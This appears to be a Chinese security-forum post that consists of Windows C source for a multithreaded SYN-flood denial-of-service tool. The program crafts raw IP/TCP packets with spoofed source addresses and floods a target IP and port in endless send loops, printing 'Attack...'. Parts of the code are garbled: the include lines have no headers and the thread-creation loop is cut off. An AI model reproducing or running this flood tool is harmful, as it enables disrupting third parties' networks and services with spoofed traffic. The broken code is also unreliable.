文章作者:xuanliang[E.S.T]
信息来源:邪恶八进制
#include
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
SOCKET g_Sock;
SOCKADDR_IN g_Addr;
//定义IP首部
typedef struct ip_head
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IPHEADER;
//定义TCP首部
typedef struct tcp_head
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;
//定义TCP伪首部
typedef struct tsd_head
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSDHEADER;
//计算校验和
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void usage()
{
printf("-----------------------------------------------------------/n");
printf("Test CreateThread/n");
printf("Useage:Target_ip Target_port Thread_num /n");
printf("-----------------------------------------------------------/n");
}
//MakeThread
int MakeThread( LPVOID pPara )
{
char *SendBuf = NULL;
int PacketSize = 0,
AddrSize = 0;
SendBuf = (char *)pPara;
PacketSize = sizeof(IPHEADER)+sizeof(TCPHEADER);
AddrSize = sizeof(SOCKADDR_IN);
while(1)
{
if ( sendto(g_Sock,
SendBuf,
PacketSize,
0,
(struct sockaddr*)&g_Addr,
AddrSize) == SOCKET_ERROR )
{
printf( "send error %d!", GetLastError() );
return false;
}
}
}
int main(int argc, char* argv[])
{
WSADATA WSAData;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;
char SendBuf[60]={0};
BOOL flag;
int nTimeOver;
int ThreadNUM;
HANDLE ThreadHandle = NULL;
int i;
int CurrentThread=0;
if (argc!=4)
{
usage();
return false;
}
if (atoi(argv[3]) > 50)
{
printf("u'd better choose 10 thread");
}
else
ThreadNUM=atoi(argv[3]);
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!");
return false;
}
if ((g_Sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!");
return false;
}
flag=true;
if (setsockopt(g_Sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!");
return false;
}
//设置发送时间
nTimeOver=1000;
if (setsockopt(g_Sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)
{
printf("setsockopt SO_SNDTIMEO error!");
return false;
}
g_Addr.sin_family=AF_INET;
g_Addr.sin_port=htons(atoi(argv[2]));
g_Addr.sin_addr.S_un.S_addr=inet_addr(argv[1]);
//填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=(unsigned char)GetTickCount()%87+123;
ipHeader.proto=IPPROTO_TCP; // 协议类型为 TCP
ipHeader.checksum=0;
ipHeader.sourceIP=htonl(GetTickCount()*474695);
ipHeader.destIP=inet_addr(argv[1]);
//填充TCP首部
SourcePort=GetTickCount()*43557%9898;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_dport=htons(atoi(argv[2]));
tcpHeader.th_seq=htonl(0x12345678);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2; //SYN
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_sum=0;
//填充TCP伪首部用来计算TCP头部的效验和
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
//计算校验和
memcpy(SendBuf, &psdHeader, sizeof(psdHeader));
memcpy(SendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)SendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(SendBuf, &ipHeader, sizeof(ipHeader));
memcpy(SendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
//创建线程
for (i=0;i
ThreadHandle=CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MakeThread, (LPVOID)SendBuf ,0, NULL);
if (ThreadHandle == NULL)
{
printf("createthread fail:%x",WSAGetLastError());
}
else
{
CurrentThread++;
printf("Thread %-3dAttack.../n",i);
//CloseHandle(ThreadHandle);
}
}
WaitForSingleObject(ThreadHandle,INFINITE);
closesocket(g_Sock);
WSACleanup();
return 0;
}